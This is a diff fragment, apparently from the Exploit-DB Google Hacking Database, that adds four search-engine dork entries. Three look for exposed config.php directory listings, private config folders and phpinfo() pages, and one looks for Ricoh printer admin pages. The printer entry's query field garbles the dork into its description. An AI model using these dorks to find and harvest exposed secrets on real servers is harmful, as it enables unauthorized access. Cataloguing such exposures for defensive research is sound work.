https://www.exploit-db.com/ghdb/8132
@@ -42654,6 +42685,21 @@ DORK: intitle:"index of" "config.js"
2021-10-04Suman Das
+
+ 8154
+ https://www.exploit-db.com/ghdb/8154
+ Files Containing Juicy Info
+ intitle:"index of" "config.php"
+ # Google Dork: intitle:"index of" "config.php"
+# Files Containing Juicy Info
+# Date: 13/04/2023
+# Exploit Author: Jerr279
+ intitle:"index of" "config.php"
+ https://www.google.com/search?q=intitle:"index of" "config.php"
+
+ 2023-04-14
+ Jerr279
+ 6048
https://www.exploit-db.com/ghdb/6048
@@ -49102,6 +49148,21 @@ Dxtroyer
2017-04-06anonymous
+
+ 8156
+ https://www.exploit-db.com/ghdb/8156
+ Files Containing Juicy Info
+ inurl:"/private" intext:"index of /" "config"
+ # Google Dork: inurl:"/private" intext:"index of /" "config"
+# Files Containing Juicy Info
+# Date: 13/04/2023
+# Exploit Author: Jerr279
+ inurl:"/private" intext:"index of /" "config"
+ https://www.google.com/search?q=inurl:"/private" intext:"index of /" "config"
+
+ 2023-04-14
+ Jerr279
+ 8152
https://www.exploit-db.com/ghdb/8152
@@ -52034,6 +52095,21 @@ Thanks & Regards
2021-01-07Rushabh Doshi
+
+ 8157
+ https://www.exploit-db.com/ghdb/8157
+ Files Containing Juicy Info
+ inurl:info.php intext:"PHP Version" intitle:"phpinfo()"
+ # Google Dork: inurl:info.php intext:"PHP Version" intitle:"phpinfo()"
+# Files containing juicy info.
+# Date: 13/04/2023
+# Exploit Author: Vitor Guaxi
+ inurl:info.php intext:"PHP Version" intitle:"phpinfo()"
+ https://www.google.com/search?q=inurl:info.php intext:"PHP Version" intitle:"phpinfo()"
+
+ 2023-04-14
+ Vitor guaxi
+ 4389
https://www.exploit-db.com/ghdb/4389
@@ -105922,6 +105998,21 @@ temperature, etc) can be found.
2006-10-02anonymous
+
+ 8158
+ https://www.exploit-db.com/ghdb/8158
+ Various Online Devices
+ intitle:Web Image Monitor inurl:mainFrame.cgi
+ # Google Dork: intitle:Web Image Monitor inurl:mainFrame.cgi
+# Various Online Devices
+# Date:14/04/2023
+# Exploit Author: Hasan Ali YILDIR
+ Google Dork: Recoh Printer Properties Page
+ https://www.google.com/search?q=Google Dork: Recoh Printer Properties Page
+
+ 2023-04-14
+ Hasan Ali YILDIR
+ 4200
https://www.exploit-db.com/ghdb/4200